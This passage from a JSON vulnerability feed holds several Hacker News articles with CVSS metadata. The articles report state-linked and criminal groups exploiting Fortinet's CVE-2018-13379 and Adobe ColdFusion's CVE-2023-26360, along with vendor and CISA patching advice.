[said](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) in a statement on Wednesday.\n\nThe disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called [RAMP](<https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/>) that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel [noting](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>) that the \"breach list contains raw access to the top companies\" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. \"2,959 out of 22,500 victims are U.S. entities,\" the researchers said.\n\n[](<https://thehackernews.com/images/-HU-9TZrc8Wo/YTm0pyWYXXI/AAAAAAAADwc/12l08TWEhOUM6FKznJkQu0G8qDlpbkrcACLcBGAsYHQ/s0/leak.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) relates to a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext. \n\nAlthough the bug was rectified in May 2019, the security weakness has been [repeatedly](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>) [exploited](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) by [multiple](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) [adversaries](<https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html>) to deploy an array of [malicious payloads](<https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html>) on unpatched devices, prompting Fortinet to issue a series of advisories in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>), and again in [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>), urging customers to upgrade affected appliances.\n\n[](<https://thehackernews.com/images/-qUrCccGMLeI/YTm0raORfPI/AAAAAAAADwg/R5dmT1pkUKwnRGYKr_SGB-GiTdIvnz1GACLcBGAsYHQ/s0/stats.jpg>)\n\nCVE-2018-13379 also emerged as one of the [top most exploited flaws](<https://thehackernews.com/2021/07/top-30-critical-security.html>) in 2020, according to a list compiled by intelligence agencies in Australia, the U.K., and the U.S. earlier this year.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above followed by initiating an organization-wide password reset, warning that \"you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T07:16:00", "type": "thn", "title": "Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T07:33:52", "id": "THN:8483C1B45A5D7BF5D501DE72F5898935", "href": "https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg6QgmIugjApGsSp_v-DgmrWh7TAwmgc2-q7he3aZA3LmwS3p9FJchpB4duBUG7J8wctZHQGDUg2jvObX6Lto5BZUAMDX2xH7JG8EDRyjRmSLmiaQl8rgHeOaQhlEL7oZDJgxSQOX8XlQiMQHLt36bKZAAJU2uaq2rKhruJOh9LNq60PhKcZc8Lj6Dn/s728-e100/hackers.jpg>)\n\nMicrosoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.\n\nIn addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by Polonium andd that it notified affected organizations.\n\n\"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques,\" MSTIC [assessed](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) with \"moderate confidence.\"\n\nThe adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.\n\nTargets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what's a case of a supply chain attack.\n\nIn a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.\n\nAttack chains mounted by the actor have involved the use of custom tools that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 with its victims using malicious tools dubbed CreepyDrive and CreepyBox.\n\n\"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run,\" the researchers said.\n\nThis is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason [disclosed](<https://thehackernews.com/2021/10/iranian-hackers-abuse-dropbox-in.html>) an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.\n\nAdditionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called [MuddyWater](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) (aka Mercury), which has been characterized by the U.S. Cyber Command as a \"subordinate element\" within MOIS.\n\nThe victim overlaps lend credence to earlier reports that MuddyWater is a \"[conglomerate](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>)\" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).\n\nTo counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:19:00", "type": "thn", "title": "Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-04T08:43:20", "id": "THN:8BA951AD00E17C72D6321234DBF80D19", "href": "https://thehackernews.com/2022/06/microsoft-blocks-iran-linked-lebanese.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T10:44:03", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXc79wyc7QrZIj1o1Og30eBY0k9d6Y7yzZShhV5ZseA7MtMlWtR5F070CPRBVasoUABzepnegbAw9FMoMRXz7DsDg2B9MzODEf4YG75y1mvzisw-kBDapS6SqlSTItoCy6JDzE13umyUK3gbVQp_IXIXim0fS9WzaZg1eOpgkKt6ZTY1lcn9vdLPtjFUpU/s728-rw-ft-e30/lock.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a [high-severity Adobe ColdFusion vulnerability](<https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html>) by unidentified threat actors to gain initial access to government servers.\n\n\"The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution,\" CISA [said](<https://www.cisa.gov/news-events/alerts/2023/12/05/cisa-releases-advisory-threat-actors-exploiting-cve-2023-26360-vulnerability-adobe-coldfusion>), adding an unnamed federal agency was targeted between June and July 2023.\n\nThe shortcoming affects ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, released on March 14, 2023, respectively.\n\nUPCOMING WEBINAR [\n\nCracking the Code: Learn How Cyber Attackers Exploit Human Psychology\n\n](<https://thehacker.news/social-engineering-psychology?source=inside>)\n\nEver wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.\n\n[Join Now](<https://thehacker.news/social-engineering-psychology?source=inside>)\n\nIt was added by CISA to the Known Exploited Vulnerabilities (KEV) catalog a day later, citing evidence of active exploitation in the wild. Adobe, in an advisory released around that time, said it's aware of the flaw being \"exploited in the wild in very limited attacks.\"\n\nThe agency noted that at least two public-facing servers were compromised using the flaw, both of which were running outdated versions of the software. \n\n\"Additionally, various commands were initiated by the threat actors on the compromised web servers; the exploited vulnerability allowed the threat actors to drop malware using HTTP POST commands to the directory path associated with ColdFusion,\" CISA noted.\n\nThere is evidence to suggest that the malicious activity is a reconnaissance effort carried out to map the broader network, although no lateral movement or data exfiltration has been observed.\n\nIn one of the incidents, the adversary was observed traversing the filesystem and uploading various artifacts to the web server, including binaries that are capable of exporting web browser cookies as well as malware designed to decrypt passwords for ColdFusion data sources.\n\nA second event recorded in early June 2023 entailed the deployment of a remote access trojan that's a modified version of the [ByPassGodzilla web shell](<https://github.com/Tas9er/ByPassGodzilla>) and \"utilizes a JavaScript loader to infect the device and requires communication with the actor-controlled server to perform actions.\"\n\n[](<https://thn.news/pjHvTZON> \"Cybersecurity\" )\n\nAlso undertaken by the adversary were attempts to exfiltrate the Windows Registry files as well as unsuccessfully download data from a command-and-control (C2) server.\n\n\"During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface,\" CISA said.\n\n\"The seed.properties file contains the seed value and encryption method used to encrypt passwords. The seed values can also be used to decrypt passwords. No malicious code was found on the victim system to indicate the threat actors attempted to decode any passwords using the values found in seed.properties file.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-12-06T10:10:00", "type": "thn", "title": "Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2023-12-06T10:10:51", "id": "THN:D10C2C7FC285D13E18415150A4507AB6", "href": "https://thehackernews.com/2023/12/hackers-exploited-coldfusion.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-cKikIN2o4zA/YK5pX-ibrqI/AAAAAAAACpU/sp4zF_WZEkMPqmuvXXvmNfX9jnVnVLdkwCLcBGAsYHQ/s0/data-wiper-ransomware.jpg>)\n\nResearchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions.\n\nCybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker \"Agrius.\"\n\n\"An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets,\" the researchers [said](<https://assets.sentinelone.com/sentinellabs/evol-agrius>). \"The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups.\"\n\nThe group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become a fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second wiper named DEADWOOD (aka Detbosit) after a logic flaw in early versions of Apostle prevented data from being erased.\n\nIn addition, the Agrius actors drop a .NET implant called IPsec Helper that can be used to exfiltrate data or deploy additional malware. What's more, the threat actor's tactics have also witnessed a shift from espionage to demanding ransoms from its victims to recover access to encrypted data, only to have them actually destroyed in a wiping attack.\n\n[](<https://thehackernews.com/images/-bw6vJJdJmK8/YK5m41wm5XI/AAAAAAAACpM/hW2cbdRji0Qr191iBSXgSHzTAfh_i9ERwCLcBGAsYHQ/s0/vpn.jpg>)\n\nBesides using ProtonVPN for anonymization, the Agrius attack cycle leverages 1-day vulnerabilities in web-based applications, including [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), to gain an initial foothold and subsequently deliver ASPXSpy web shells to maintain remote access to compromised systems and run arbitrary commands.\n\nIf anything, the research adds to evidence that state-sponsored actors with ties to the Iranian government are increasingly looking at ransomware operations as a subterfuge technique to mimic other financially motivated cybercriminal ransomware groups.\n\nRecently leaked documents by Lab Dookhtegan revealed an initiative called \"[Project Signal](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>)'' that linked Iran's Islamic Revolutionary Guard Corps to a ransomware operation through a contracting company.\n\n\"While being disruptive and effective, ransomware activities provide deniability, allowing states to send a message without taking direct blame,\" the researchers said. \"Similar strategies have been used with devastating effect by [other nation-state sponsored actors](<https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html>).\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T15:30:00", "type": "thn", "title": "Data Wiper Malware Disguised As Ransomware Targets Israeli Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-07T05:01:48", "id": "THN:EAEDDF531EB90375B350E1580DE3DD02", "href": "https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:22", "description": "[](<https://thehackernews.com/images/-wqhJpW-QhTc/YG79n_lop2I/AAAAAAAACNY/ZnMOyKz8e6Adj5Hy8a5WXa_-MbqnDgRLwCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nUnpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called \"Cring\" inside corporate networks.\n\nAt least one of the hacking incidents led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim.\n\nThe attacks happened in the first quarter of 2021, between January and March.\n\n\"Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage,\" [said](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT.\n\nThe disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) of advanced persistent threat (APT) actors actively scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379, among others.\n\n\"APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks,\" the agency said.\n\n[](<https://thehackernews.com/images/-5QwYhR-6pQ0/YG794Oq_4BI/AAAAAAAACNg/cbtbheKh0Z4gm3R1vdQ6cdPUmQT6WjUNwCLcBGAsYHQ/s0/hack.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) concerns a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext.\n\nAlthough patches for the vulnerability were released in [May 2019](<https://www.fortiguard.com/psirt/FG-IR-18-384>), Fortinet said last November that it identified a \"[large number](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\" of VPN appliances that remained unpatched, while also cautioning that IP addresses of those internet-facing vulnerable devices were being sold on the dark web.\n\nIn a statement shared with The Hacker News, Fortinet said it had urged customers to upgrade their appliances \"on multiple occasions in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), and again in [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>)\" following the May 2019 fix. \"If customers have not done so, we urge them to immediately implement the upgrade and mitigations,\" the company said.\n\nThe attacks aimed at European businesses were no different, according to Kaspersky's incident response, which found that the deployment of Cring ransomware involved the exploitation of CVE-2018-13379 to gain access to the target networks.\n\n\"Some time prior to the main phase of the operation, the attackers performed test connections to the VPN Gateway, apparently in order to make sure that the stolen user credentials for the VPN were still valid,\" Kaspersky researchers said.\n\nUpon gaining access, the adversaries are said to have used the Mimikatz utility to siphon account credentials of Windows users who had previously logged in to the compromised system, then utilizing them to break into the domain administrator account, move laterally across the network, and eventually deploy the Cring ransomware on each machine remotely using the Cobalt Strike framework.\n\n[Cring](<https://malpedia.caad.fkie.fraunhofer.de/details/win.cring>), a nascent strain that was first observed in January 2021 by telecom provider Swisscom, encrypts specific files on the devices using strong encryption algorithms after removing traces of all backup files and terminating Microsoft Office and Oracle Database processes. Following successful encryption, it drops a ransom note demanding payment of two bitcoins.\n\n[](<https://thehackernews.com/images/-zg8HygZ73Eo/YG7-LtYB1JI/AAAAAAAACNo/wj8rvRY9io4E_QWg643XIdI94kejG4D5gCLcBGAsYHQ/s0/cybersecurity.jpg>)\n\nWhat's more, the threat actor was careful to hide their activity by disguising the malicious PowerShell scripts under the name \"kaspersky\" to evade detection and ensured that the server hosting the ransomware payload only responded to requests coming in from European countries.\n\n\"An analysis of the attackers' activity demonstrates that, based on the results of the reconnaissance performed on the attacked organization's network, they chose to encrypt those servers which the attackers believed would cause the greatest damage to the enterprise's operations if lost,\" Kopeytsev [said](<https://usa.kaspersky.com/about/press-releases/2021_na-cring-ransomware-infects-industrial-targets-through-vulnerability-in-vpn-servers>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-08T13:12:00", "type": "thn", "title": "Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-13T05:39:44", "id": "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "href": "https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgcW-6sY33kcH0dmBIKaK9mpaBaPRVIHpXHjT6Hgy_cMiHxlaNJfxuW1eMvQDiHyvzDLYVJGlJVA2b_pyL6m02QdpItx8VmJbN4PgH539vr05iJNN2nhAyDflMWDr-NbNmKaPQvhSn59trm4goPShyfhF5aIO8nNOTMAMBWoNZZ5zvA73ryI_wfVzbT>)\n\nA \"potentially destructive actor\" aligned with the government of Iran is actively exploiting the well-known [Log4j vulnerability](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) to infect unpatched VMware Horizon servers with ransomware.\n\nCybersecurity firm SentinelOne dubbed the group \"**TunnelVision**\" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker [Phosphorus](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) as well as Charming Kitten and Nemesis Kitten.\n\n\"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,\" SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky [said](<https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/>) in a report, with the intrusions detected in the Middle East and the U.S.\n\nAlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ([CVE-2018-13379](<https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html>)) and the Microsoft Exchange [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) vulnerability to gain initial access into the target networks for post-exploitation.\n\n\"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,\" the researchers said.\n\nThe PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands.\n\nSentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called [PowerLess](<https://thehackernews.com/2022/02/iranian-hackers-using-new-powershell.html>) that was disclosed by Cybereason researchers earlier this month.\n\nAll through the activity, the threat actor is said to have utilized a GitHub repository known as \"VmWareHorizon\" under the username \"protections20\" to host the malicious payloads.\n\nThe cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that \"there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T07:40:00", "type": "thn", "title": "Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-18T07:40:44", "id": "THN:F25FAD25E15EBBE4934883ABF480294D", "href": "https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-16T10:16:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjg8T1EAux0KjF2qw7H0gjPvv33p8vffhuoidvlZzQAXU8bJN3Nq5k5bM0kcjuLxKZop93NztZC75oLL4gBZQ0esCjwHeIfb7ItaCyRCe-DegY_7roFlj_V-9jA86hVciMrc8cTkPflp9xUYKw04ig9pO6BNhbFWAf5hCt6clL2R4eWcm80nFGB9SsD/s728-e365/alert.png>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 [added](<https://www.cisa.gov/news-events/alerts/2023/03/15/cisa-adds-one-known-exploited-vulnerability-catalog>) a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.\n\nThe critical flaw in question is [CVE-2023-26360](<https://nvd.nist.gov/vuln/detail/CVE-2023-26360>) (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution.\n\n\"Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution,\" CISA [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThe vulnerability impacts ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, respectively, released on March 14, 2023.\n\nIt's worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have [reached](<https://helpx.adobe.com/in/support/programs/eol-matrix.html>) end-of-life (EoL).\n\nWhile the exact details surrounding the nature of the attacks are unknown, Adobe [said](<https://helpx.adobe.com/security/products/coldfusion/apsb23-25.html>) in an advisory that it's aware of the flaw being \"exploited in the wild in very limited attacks.\"\n\nFederal Civilian Executive Branch (FCEB) agencies are required to apply the updates by April 5, 2023, to safeguard their networks against potential 